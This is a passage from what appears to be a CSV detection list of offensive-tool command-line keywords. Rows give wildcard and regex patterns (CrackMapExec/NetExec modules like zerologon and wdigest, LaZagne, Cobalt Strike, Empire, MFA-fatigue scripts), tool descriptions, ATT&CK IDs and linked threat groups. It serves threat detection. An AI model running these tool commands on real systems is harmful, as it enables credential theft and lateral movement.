Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2087" "* -M scuffy -o SERVER=127.0.0.1*",".{0,1000}\s\-M\sscuffy\s\-o\sSERVER\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2088" "* -M scuffy*",".{0,1000}\s\-M\sscuffy.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2089" "* -M shadowcoerce *",".{0,1000}\s\-M\sshadowcoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2090" "* -M shadowcoerce*",".{0,1000}\s\-M\sshadowcoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2091" "* -M shellcode_inject*",".{0,1000}\s\-M\sshellcode_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2092" "* -M slinky",".{0,1000}\s\-M\sslinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2094" "* -M slinky -o SERVER=*",".{0,1000}\s\-M\sslinky\s\-o\sSERVER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2095" "* -M spider_plus 
*",".{0,1000}\s\-M\sspider_plus\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2096" "* -M spider_plus -o MAX_FILE_SIZE=100*",".{0,1000}\s\-M\sspider_plus\s\-o\sMAX_FILE_SIZE\=100.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2097" "* -M teams_localdb *",".{0,1000}\s\-M\steams_localdb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2099" "* -M tokens*",".{0,1000}\s\-M\stokens.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2100" "* -M uac",".{0,1000}\s\-M\suac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2101" "* -m venv csexec *",".{0,1000}\s\-m\svenv\scsexec\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2102" "* -M wdigest -o ACTION=disable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=disable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2103" "* -M wdigest -o ACTION=enable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2104" "* -M web_delivery*",".{0,1000}\s\-M\sweb_delivery.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2105" "* -M zerologon *",".{0,1000}\s\-M\szerologon\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2106" "* m365-fatigue.py *",".{0,1000}\sm365\-fatigue\.py\s.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. 
It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","2107" "* m3-gen.py *",".{0,1000}\sm3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2108" "* macro_pack.py*",".{0,1000}\smacro_pack\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2110" "* main.c log.c shelljack.c *",".{0,1000}\smain\.c\s\slog\.c\sshelljack\.c\s.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","2111" "* MakeMeEnterpriseAdmin.ps1",".{0,1000}\sMakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","2112" "* --maketoken --username * --password * --domain *",".{0,1000}\s\-\-maketoken\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-domain\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","2113" "* --malicious-package *",".{0,1000}\s\-\-malicious\-package\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2114" "* malleable.profile*",".{0,1000}\smalleable\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","2115" "* 
malleable-c2-randomizer*",".{0,1000}\smalleable\-c2\-randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","2116" "* --mangle-strip-go *",".{0,1000}\s\-\-mangle\-strip\-go\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other 
Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2117" "* mask?a?a?a?a?*",".{0,1000}\smask\?a\?a\?a\?a\?.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2118" "* --mask=?1?1?1* --min-len*",".{0,1000}\s\-\-mask\=\?1\?1\?1.{0,1000}\s\-\-min\-len.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2119" "* --max-attack-time*",".{0,1000}\s\-\-max\-attack\-time.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","2120" "* maxdb-info.nse*",".{0,1000}\smaxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2121" "* -mc all -fc 404 -sf -noninteractive -of json*",".{0,1000}\s\-mc\sall\s\-fc\s404\s\-sf\s\-noninteractive\s\-of\sjson.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2122" "* mcafee-epo-agent.nse*",".{0,1000}\smcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2123" "* -mdns y -mdnsunicast n*",".{0,1000}\s\-mdns\sy\s\-mdnsunicast\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2124" "* -mDNSTTL *",".{0,1000}\s\-mDNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2125" "* membase-brute.nse*",".{0,1000}\smembase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2130" "* membase-http-info.nse*",".{0,1000}\smembase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2131" "* memcached-info.nse*",".{0,1000}\smemcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2132" "* memexec.pl*",".{0,1000}\smemexec\.pl.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","2133" "* memexec.py*",".{0,1000}\smemexec\.py.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","2134" "* memorpy *",".{0,1000}\smemorpy\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2135" "* memorydump.py*",".{0,1000}\smemorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","2136" "* memreader.c *",".{0,1000}\smemreader\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
